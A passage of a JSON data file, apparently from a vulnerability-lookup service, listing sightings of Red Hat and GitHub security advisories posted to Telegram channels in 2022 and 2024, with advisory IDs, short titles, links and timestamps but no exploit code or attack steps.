Moderate: haproxy security update", "creation_timestamp": "2024-03-13T16:21:52.000000Z"}, {"uuid": "7fbaa0f8-2417-4c98-adad-c91155f367cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1409", "type": "seen", "source": "https://t.me/ctinow/211789", "content": "https://ift.tt/W9iD6Vx\nRHSA-2024:1409: Moderate: cups security update", "creation_timestamp": "2024-03-19T18:16:35.000000Z"}, {"uuid": "d3c3c629-e116-4338-8c31-950837e789a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4JHJ-3GV3-C3GR", "type": "seen", "source": "https://t.me/ctinow/209150", "content": "https://ift.tt/uNsrGQW\n[GHSA-4jhj-3gv3-c3gr] CLI for Vela Insecure Variable Substitution", "creation_timestamp": "2024-03-15T21:22:00.000000Z"}, {"uuid": "df31ac79-3ec1-48f3-aadd-3f04cd6ef13c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PF87-6C9Q-JVM4", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/1592", "content": "#exploit\n1. Linux Kernel:\nUAF in Bluetooth L2CAP Handshake\nhttps://github.com/google/security-research/security/advisories/GHSA-pf87-6c9q-jvm4\nInfoleak in Bluetooth L2CAP Handling\nhttps://github.com/google/security-research/security/advisories/GHSA-vccx-8h74-2357\n\n2. Xiongmai IoT Exploitation\nhttps://vulncheck.com/blog/xiongmai-iot-exploitation", "creation_timestamp": "2022-12-01T19:56:42.000000Z"}, {"uuid": "56ae65da-c59e-402a-a87a-c1b574c36cac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VCCX-8H74-2357", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/1592", "content": "#exploit\n1. Linux Kernel:\nUAF in Bluetooth L2CAP Handshake\nhttps://github.com/google/security-research/security/advisories/GHSA-pf87-6c9q-jvm4\nInfoleak in Bluetooth L2CAP Handling\nhttps://github.com/google/security-research/security/advisories/GHSA-vccx-8h74-2357\n\n2. Xiongmai IoT Exploitation\nhttps://vulncheck.com/blog/xiongmai-iot-exploitation", "creation_timestamp": "2022-12-01T19:56:42.000000Z"}, {"uuid": "507e40f0-4939-4db5-a38a-eb64b94936f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1088", "type": "seen", "source": "https://t.me/ctinow/206841", "content": "https://ift.tt/b2387Lt\nRHSA-2024:1088: Moderate: libX11 security update", "creation_timestamp": "2024-03-13T16:21:53.000000Z"}, {"uuid": "f0b9db19-9840-4cb0-a636-55d7bf3ef8cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1267", "type": "seen", "source": "https://t.me/ctinow/212080", "content": "https://ift.tt/gzGyqOH\nRHSA-2024:1267: Important: OpenShift Container Platform 4.12.53 packages and security update", "creation_timestamp": "2024-03-20T03:16:32.000000Z"}, {"uuid": "f1e78059-910b-46dc-b15f-3401641a306c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1433", "type": "seen", "source": "https://t.me/ctinow/212068", "content": "https://ift.tt/f4LQzvT\nRHSA-2024:1433: Moderate: Migration Toolkit for Applications security and bug fix update", "creation_timestamp": "2024-03-20T02:16:26.000000Z"}, {"uuid": "b71a6088-74dc-4ca9-8abf-9075f152fc96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1363", "type": "seen", "source": "https://t.me/ctinow/212025", "content": "https://ift.tt/0l8S7bP\nRHSA-2024:1363: Moderate: OpenShift Container Platform 4.15.3 low-latency extras security update", "creation_timestamp": "2024-03-20T00:16:24.000000Z"}, {"uuid": "8cc86884-d1f6-41ee-b412-b998d643b559", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PMF3-C36M-G5CF", "type": "seen", "source": "https://t.me/ctinow/211934", "content": "https://ift.tt/iEPAH1F\n[GHSA-pmf3-c36m-g5cf] Container escape at build time", "creation_timestamp": "2024-03-19T21:16:11.000000Z"}, {"uuid": "11e08677-435e-49f8-b298-a485b9707c28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6HH7-46R2-VF29", "type": "seen", "source": "https://t.me/ctinow/211935", "content": "https://ift.tt/PLH1JuU\n[GHSA-6hh7-46r2-vf29] Server crashes on invalid Cloud Function or Cloud Job name", "creation_timestamp": "2024-03-19T21:16:12.000000Z"}, {"uuid": "eda973d0-9e62-4737-9251-a745e2b4b057", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4075", "type": "seen", "source": "https://t.me/ctinow/211921", "content": "https://ift.tt/IJs9OYz\nCVE-2019-14854 | Openshift Container Platform 4 Static Pod Log neutralization for logs (RHSA-2019:4075)", "creation_timestamp": "2024-03-19T20:46:59.000000Z"}, {"uuid": "e1e26754-b930-4fd6-a955-193cdf448f7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1431", "type": "seen", "source": "https://t.me/ctinow/211902", "content": "https://ift.tt/GqeFvdp\nRHSA-2024:1431: Moderate: ruby:3.1 security, bug fix, and enhancement update", "creation_timestamp": "2024-03-19T20:16:32.000000Z"}, {"uuid": "50953146-477b-4601-a7bc-54b0c1651ca2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1317", "type": "seen", "source": "https://t.me/ctinow/210818", "content": "https://ift.tt/74eLuEf\nRHSA-2024:1317: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.57 SP3 security update", "creation_timestamp": "2024-03-18T18:16:21.000000Z"}, {"uuid": "b4707b18-82da-4234-af31-4684c299f584", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QMGX-J96G-4428", "type": "seen", "source": "https://t.me/ctinow/209114", "content": "https://ift.tt/MCZYlzK\n[GHSA-qmgx-j96g-4428] SSRF vulnerability using the Aegis DataBinding in Apache CXF", "creation_timestamp": "2024-03-15T20:56:04.000000Z"}, {"uuid": "32549419-361a-4acb-9564-1f813160fee8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JWV5-8MQV-G387", "type": "seen", "source": "https://t.me/ctinow/209113", "content": "https://ift.tt/tVkwcTR\n[GHSA-jwv5-8mqv-g387] Cross-site scripting on application summary component", "creation_timestamp": "2024-03-15T20:56:03.000000Z"}, {"uuid": "7bd3b8ea-2ca4-420f-b90d-81bde4335f28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R978-9M6M-6GM6", "type": "seen", "source": "https://t.me/ctinow/209109", "content": "https://ift.tt/4lr9WDC\n[GHSA-r978-9m6m-6gm6] Apache ZooKeeper vulnerable to information disclosure in persistent watchers handling", "creation_timestamp": "2024-03-15T20:46:24.000000Z"}, {"uuid": "0088aac0-bcaa-4004-9ef7-3d08b60d6488", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-32JQ-MV89-5RX7", "type": "seen", "source": "https://t.me/ctinow/209099", "content": "https://ift.tt/iWUvefz\n[GHSA-32jq-mv89-5rx7] CoreWCF NetFraming based services can leave connections open when they should be closed", "creation_timestamp": "2024-03-15T20:36:36.000000Z"}, {"uuid": "3ca2cfa0-4db9-4539-91f3-817b22de8964", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7W75-32CG-R6G2", "type": "seen", "source": "https://t.me/ctinow/208964", "content": "https://ift.tt/DcAmJs8\n[GHSA-7w75-32cg-r6g2] Apache Tomcat Denial of Service due to improper input validation vulnerability for HTTP/2 requests", "creation_timestamp": "2024-03-15T17:37:08.000000Z"}, {"uuid": "1f5f2b61-64d0-4ca9-abca-0e9da43ca167", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1383", "type": "seen", "source": "https://t.me/ctinow/211720", "content": "https://ift.tt/k75qWm9\nRHSA-2024:1383: Important: Red Hat OpenShift Data Foundation 4.15.0 security, enhancement, &amp; bug fix update", "creation_timestamp": "2024-03-19T17:16:26.000000Z"}, {"uuid": "60eb214b-e4d2-4f33-a4da-c155d72207b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1386", "type": "seen", "source": "https://t.me/ctinow/211719", "content": "https://ift.tt/cAJGCjL\nRHSA-2024:1386: Important: ovn22.12 security update", "creation_timestamp": "2024-03-19T17:16:25.000000Z"}, {"uuid": "7823dcbc-0183-405a-8f13-f843b53ae3b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1390", "type": "seen", "source": "https://t.me/ctinow/211718", "content": "https://ift.tt/l5gUDIw\nRHSA-2024:1390: Important: ovn23.09 security update", "creation_timestamp": "2024-03-19T17:16:24.000000Z"}, {"uuid": "03fac20e-b23d-4edd-9701-404c929d1208", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1391", "type": "seen", "source": "https://t.me/ctinow/211717", "content": "https://ift.tt/eP32BTH\nRHSA-2024:1391: Important: ovn23.06 security update", "creation_timestamp": "2024-03-19T17:16:23.000000Z"}, {"uuid": "79106340-d7ea-4f74-ae69-7470f0eb8e73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1392", "type": "seen", "source": "https://t.me/ctinow/211716", "content": "https://ift.tt/HsT1x54\nRHSA-2024:1392: Important: ovn22.12 security update", "creation_timestamp": "2024-03-19T17:16:22.000000Z"}, {"uuid": "a3666fc3-11cb-4636-ae9b-10e8ff0003d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1393", "type": "seen", "source": "https://t.me/ctinow/211715", "content": "https://ift.tt/t8uApq5\nRHSA-2024:1393: Important: ovn22.03 security update", "creation_timestamp": "2024-03-19T17:16:21.000000Z"}, {"uuid": "a1b40a34-52d4-4566-85eb-3bc426de39ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1394", "type": "seen", "source": "https://t.me/ctinow/211714", "content": "https://ift.tt/m8W30lj\nRHSA-2024:1394: Important: ovn23.03 security update", "creation_timestamp": "2024-03-19T17:16:20.000000Z"}, {"uuid": "094c885c-3630-4d6d-98a6-beca147a0e20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1324", "type": "seen", "source": "https://t.me/ctinow/211713", "content": "https://ift.tt/NDmkCYf\nRHSA-2024:1324: Important: Red Hat JBoss Web Server 6.0.1 release and security update", "creation_timestamp": "2024-03-19T17:16:18.000000Z"}, {"uuid": "b682c22e-0471-459b-b8e6-f5442675dd25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H574-6646-VFXX", "type": "seen", "source": "https://t.me/ctinow/208849", "content": "https://ift.tt/Ae4IGSh\n[GHSA-h574-6646-vfxx] Apache Airflow: Ignored Airflow Permission", "creation_timestamp": "2024-03-15T15:22:19.000000Z"}, {"uuid": "0c215a8c-735f-486e-8594-e1929495c996", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4356", "type": "seen", "source": "https://t.me/ctinow/208818", "content": "https://ift.tt/QtJ053T\nCVE-2019-1387 | Git up to 2.24.0 Clone input validation (RHSA-2019:4356)", "creation_timestamp": "2024-03-15T14:52:17.000000Z"}, {"uuid": "342a74c4-4a2a-439b-86ad-f2b53364ba45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CXJH-PQWP-8MFP", "type": "seen", "source": "https://t.me/ctinow/208013", "content": "https://ift.tt/B3iaSzO\n[GHSA-cxjh-pqwp-8mfp] follow-redirects' Proxy-Authorization header kept across hosts", "creation_timestamp": "2024-03-14T18:22:48.000000Z"}, {"uuid": "85914430-1810-468c-89bf-401862a5a3f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1321", "type": "seen", "source": "https://t.me/ctinow/207208", "content": "https://ift.tt/Cs9oJF7\nRHSA-2024:1321: Moderate: ACS 4.3 enhancement and security update", "creation_timestamp": "2024-03-13T22:16:29.000000Z"}, {"uuid": "f0db2889-acd7-40d8-9f3e-721647ee2cbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G627-R579-RW35", "type": "seen", "source": "https://t.me/ctinow/207190", "content": "https://ift.tt/nuXRfHG\n[GHSA-g627-r579-rw35] Apache Pulsar: Improper Authorization For Topic-Level Policy Management", "creation_timestamp": "2024-03-13T21:56:44.000000Z"}, {"uuid": "fff82e97-e59e-43bb-90e4-831b04271ba0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7G97-7R3C-5CC6", "type": "seen", "source": "https://t.me/ctinow/207050", "content": "https://ift.tt/5Bf0LOR\n[GHSA-7g97-7r3c-5cc6] In Quarkus, git credentials could be inadvertently published", "creation_timestamp": "2024-03-13T19:26:50.000000Z"}, {"uuid": "3c480dbf-b92b-477b-8836-400ba332b1b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1314", "type": "seen", "source": "https://t.me/ctinow/206857", "content": "https://ift.tt/OxKyBEV\nRHSA-2024:1314: Important: postgresql:15 security update", "creation_timestamp": "2024-03-13T16:22:13.000000Z"}, {"uuid": "2e29f7a3-4de5-4ee6-a2fe-8df479fb9146", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:3950", "type": "seen", "source": "https://t.me/ctinow/212137", "content": "https://ift.tt/7Joguv8\nCVE-2019-14906 | Red Hat SDL up to 1.2.15/2.0.9 out-of-bounds (RHSA-2019:3950)", "creation_timestamp": "2024-03-20T07:26:55.000000Z"}, {"uuid": "f8510a4d-b755-485c-9adc-26cc9bb72882", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1265", "type": "seen", "source": "https://t.me/ctinow/212081", "content": "https://ift.tt/Dw8tsog\nRHSA-2024:1265: Moderate: OpenShift Container Platform 4.12.53 bug fix and security update", "creation_timestamp": "2024-03-20T03:16:33.000000Z"}, {"uuid": "f1879bb6-be42-436c-84cd-cbbd5cab55cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VMQV-47J8-GWV8", "type": "seen", "source": "https://t.me/ctinow/206977", "content": "https://ift.tt/GoqfC3B\n[GHSA-vmqv-47j8-gwv8] Remote Code Execution Vulnerability in Microsoft Django Backend for SQL Server", "creation_timestamp": "2024-03-13T18:11:20.000000Z"}, {"uuid": "d643c527-cc7b-454b-8976-915d4cafc7a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1241", "type": "seen", "source": "https://t.me/ctinow/206845", "content": "https://ift.tt/NAqSIl8\nRHSA-2024:1241: Important: postgresql security update", "creation_timestamp": "2024-03-13T16:21:57.000000Z"}, {"uuid": "22158feb-a1f4-42e7-b8d8-9b365ed4f734", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1244", "type": "seen", "source": "https://t.me/ctinow/206844", "content": "https://ift.tt/ifdqHGk\nRHSA-2024:1244: Moderate: rhc-worker-script security update", "creation_timestamp": "2024-03-13T16:21:56.000000Z"}, {"uuid": "66d52815-cdc5-475f-b386-3b6f42e87191", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1081", "type": "seen", "source": "https://t.me/ctinow/206843", "content": "https://ift.tt/my97xbV\nRHSA-2024:1081: Moderate: sqlite security update", "creation_timestamp": "2024-03-13T16:21:55.000000Z"}, {"uuid": "955422bc-4711-4bee-a24c-78c5d1ee78aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1086", "type": "seen", "source": "https://t.me/ctinow/206842", "content": "https://ift.tt/KQCX8sW\nRHSA-2024:1086: Moderate: libfastjson security update", "creation_timestamp": "2024-03-13T16:21:54.000000Z"}, {"uuid": "c269e599-8739-425f-8b32-ab355fe8221d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1422", "type": "seen", "source": "https://t.me/ctinow/211860", "content": "https://ift.tt/5Mu8FQA\nRHSA-2024:1422: Important: postgresql security update", "creation_timestamp": "2024-03-19T19:21:49.000000Z"}, {"uuid": "0f83c875-aa72-4e31-a0a2-654cce5c247e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1424", "type": "seen", "source": "https://t.me/ctinow/211858", "content": "https://ift.tt/RJPTS65\nRHSA-2024:1424: Important: nodejs security update", "creation_timestamp": "2024-03-19T19:21:47.000000Z"}, {"uuid": "9b68ac8e-0c4a-4ac3-bf68-a08bb44a0529", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1423", "type": "seen", "source": "https://t.me/ctinow/211859", "content": "https://ift.tt/8PaZl9q\nRHSA-2024:1423: Important: libreoffice security update", "creation_timestamp": "2024-03-19T19:21:48.000000Z"}, {"uuid": "9dfee81c-216f-42af-90c3-f3fa7a4fe016", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1425", "type": "seen", "source": "https://t.me/ctinow/211857", "content": "https://ift.tt/uhWS7AO\nRHSA-2024:1425: Important: libreoffice security update", "creation_timestamp": "2024-03-19T19:21:46.000000Z"}, {"uuid": "d5f0b9e0-fb1d-400d-9ceb-c3328443f7e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1426", "type": "seen", "source": "https://t.me/ctinow/211856", "content": "https://ift.tt/GbMPQq3\nRHSA-2024:1426: Important: postgresql security update", "creation_timestamp": "2024-03-19T19:21:45.000000Z"}, {"uuid": "6e3f4104-183b-43fd-a57d-0339c13b7c12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1382", "type": "seen", "source": "https://t.me/ctinow/211661", "content": "https://ift.tt/pvSHobC\nRHSA-2024:1382: Important: kernel-rt security and bug fix update", "creation_timestamp": "2024-03-19T16:11:53.000000Z"}, {"uuid": "1a856e19-85ee-4d8e-970d-617c0ef64279", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1377", "type": "seen", "source": "https://t.me/ctinow/211662", "content": "https://ift.tt/a4JsH2R\nRHSA-2024:1377: Important: kpatch-patch security update", "creation_timestamp": "2024-03-19T16:11:54.000000Z"}, {"uuid": "bb70231d-03ee-4e81-a46f-0a2b5d5b953c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2X7M-GF85-3745", "type": "seen", "source": "https://t.me/ctinow/207000", "content": "https://ift.tt/6XCQVqe\n[GHSA-2x7m-gf85-3745] Remote Denial of Service Vulnerability in Microsoft QUIC", "creation_timestamp": "2024-03-13T18:27:33.000000Z"}, {"uuid": "4a9715a2-7234-43ba-99df-c17f42b81931", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:2818", "type": "seen", "source": "https://t.me/ctinow/211900", "content": "https://ift.tt/5JWOVIf\nCVE-2019-14819 | OpenShift Container Platform 3 3.x CRI-O privileges assignment (RHSA-2019:2818)", "creation_timestamp": "2024-03-19T20:11:51.000000Z"}, {"uuid": "e97d892a-3d14-465b-b99d-e6636fc9ff60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1427", "type": "seen", "source": "https://t.me/ctinow/211855", "content": "https://ift.tt/ONzGbjP\nRHSA-2024:1427: Important: libreoffice security update", "creation_timestamp": "2024-03-19T19:21:44.000000Z"}, {"uuid": "f5e87fdc-b80d-4c0a-a785-f956f8a0ed4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1429", "type": "seen", "source": "https://t.me/ctinow/211854", "content": "https://ift.tt/yZfdmuV\nRHSA-2024:1429: Important: postgresql security update", "creation_timestamp": "2024-03-19T19:21:43.000000Z"}, {"uuid": "3417940f-ceae-427d-b84c-798dd1860c06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1334", "type": "seen", "source": "https://t.me/ctinow/207954", "content": "https://ift.tt/neFivKO\nRHSA-2024:1334: Important: dnsmasq security update", "creation_timestamp": "2024-03-14T17:17:19.000000Z"}, {"uuid": "acdf8bd4-658a-44d5-a7a5-8bf6d7bf4c38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1335", "type": "seen", "source": "https://t.me/ctinow/207953", "content": "https://ift.tt/WUg9wKo\nRHSA-2024:1335: Important: dnsmasq security update", "creation_timestamp": "2024-03-14T17:17:17.000000Z"}, {"uuid": "7bfbb89c-cad4-4746-a607-b225856ce2a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1328", "type": "seen", "source": "https://t.me/ctinow/207840", "content": "https://ift.tt/SoOn6cw\nRHSA-2024:1328: Moderate: Red Hat Advanced Cluster Management 2.9.3 security and bug fix container updates", "creation_timestamp": "2024-03-14T15:16:44.000000Z"}, {"uuid": "de166671-fee8-4df5-96b5-64e4893e3629", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V682-8VV8-VPWR", "type": "seen", "source": "https://t.me/ctinow/207837", "content": "https://ift.tt/cD3KBxp\n[GHSA-v682-8vv8-vpwr] Denial of Service via incomplete cleanup vulnerability in Apache Tomcat", "creation_timestamp": "2024-03-14T15:16:41.000000Z"}, {"uuid": "04438b01-7d60-4be1-94e7-fe57fd54cb54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1411", "type": "seen", "source": "https://t.me/ctinow/211788", "content": "https://ift.tt/Z7sTq5z\nRHSA-2024:1411: Moderate: opencryptoki security update", "creation_timestamp": "2024-03-19T18:16:33.000000Z"}, {"uuid": "1885c0aa-1953-4e87-828d-69b2c1bc35be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1412", "type": "seen", "source": "https://t.me/ctinow/211787", "content": "https://ift.tt/ehswG1a\nRHSA-2024:1412: Moderate: gmp update", "creation_timestamp": "2024-03-19T18:16:33.000000Z"}, {"uuid": "230d7697-55ca-4f3f-affb-1681d3b3ce93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VM8Q-M57G-PFF3", "type": "seen", "source": "https://t.me/ctinow/210974", "content": "https://ift.tt/rtgi73m\n[GHSA-vm8q-m57g-pff3] Regular expression denial-of-service in Django", "creation_timestamp": "2024-03-18T21:46:13.000000Z"}, {"uuid": "fc026c2d-c7b3-4ded-bf13-32906e8cd3f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H2X6-5JX5-46HF", "type": "seen", "source": "https://t.me/ctinow/210966", "content": "https://ift.tt/HE5rXpf\n[GHSA-h2x6-5jx5-46hf] RCE in TranformGraph().to_dot_graph function", "creation_timestamp": "2024-03-18T21:37:03.000000Z"}, {"uuid": "8af5d9b1-bd59-4fff-910f-72ce25ac225d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1333", "type": "seen", "source": "https://t.me/ctinow/207903", "content": "https://ift.tt/ulor32n\nRHSA-2024:1333: Moderate: Release of OpenShift Serverless 1.32.0", "creation_timestamp": "2024-03-14T16:16:57.000000Z"}, {"uuid": "cdb8be57-2624-4fb8-b8f5-75cf303c7f57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1332", "type": "seen", "source": "https://t.me/ctinow/207904", "content": "https://ift.tt/VYD6k2I\nRHSA-2024:1332: Important: kernel-rt security update", "creation_timestamp": "2024-03-14T16:16:58.000000Z"}, {"uuid": "54c88588-b054-4bc6-89ef-a6d5fc9602d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1327", "type": "seen", "source": "https://t.me/ctinow/207658", "content": "https://ift.tt/fua0M5m\nRHSA-2024:1327: Important: gimp:2.8 security update", "creation_timestamp": "2024-03-14T12:16:34.000000Z"}, {"uuid": "84abbac9-b742-44fa-bac2-90fe518968f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1323", "type": "seen", 